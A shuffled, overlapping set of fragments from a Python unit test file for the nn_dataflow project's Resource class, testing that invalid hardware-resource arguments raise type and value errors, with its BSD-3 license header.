".*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'):",
"\"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, )",
"be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY",
"Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region,",
") with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16),",
"src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self):",
") def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ =",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ =",
"self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux,",
"array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def",
"A PARTICULAR PURPOSE. See the BSD-3 License for more details. You should have",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"redistribute it and/or modify it under the terms of the Modified BSD-3 License",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'):",
"the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'):",
"NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests",
") def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ =",
"dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2,",
"Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC)",
"dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16,",
"0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def",
"Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2,",
"the Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\"",
"test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self):",
"This program is distributed in the hope that it will be useful, but",
"'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, )",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region,",
"nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource.",
"test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"Initiative. This program is distributed in the hope that it will be useful,",
"type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False,",
"test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): '''",
"type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0,",
"by the Open Source Initiative. This program is distributed in the hope that",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM.",
"= Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _",
"self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. '''",
"dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): '''",
"self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self):",
"Source Initiative. This program is distributed in the hope that it will be",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=None,",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'):",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with",
"2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"of Trustees of Stanford University This program is free software: you can redistribute",
"is free software: you can redistribute it and/or modify it under the terms",
"as published by the Open Source Initiative. This program is distributed in the",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type",
"dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;",
"'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"have received a copy of the Modified BSD-3 License along with this program.",
"WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR",
"'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region =",
"Modified BSD-3 License as published by the Open Source Initiative. This program is",
"free software: you can redistribute it and/or modify it under the terms of",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
") def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource:",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with",
"even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. '''",
"Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'):",
"Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"Trustees of Stanford University This program is free software: you can redistribute it",
"2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf')",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _",
"PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16),",
"arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"= Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def",
"''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"terms of the Modified BSD-3 License as published by the Open Source Initiative.",
"= Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"License as published by the Open Source Initiative. This program is distributed in",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): '''",
"self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region.",
"2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region =",
"''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False,",
"dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self):",
"BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'):",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim,",
"Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"(C) 2016-2019 by The Board of Trustees of Stanford University This program is",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ =",
"16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128,",
"Open Source Initiative. This program is distributed in the hope that it will",
"modify it under the terms of the Modified BSD-3 License as published by",
"FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details. You should",
"import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. '''",
"def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"Stanford University This program is free software: you can redistribute it and/or modify",
") def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ =",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self):",
"can redistribute it and/or modify it under the terms of the Modified BSD-3",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError,",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): '''",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"and/or modify it under the terms of the Modified BSD-3 License as published",
"no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1),",
"for more details. You should have received a copy of the Modified BSD-3",
"'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _",
"resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _",
"it and/or modify it under the terms of the Modified BSD-3 License as",
"<https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from",
"no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _",
"size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError,",
"no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _",
"Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
") def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ =",
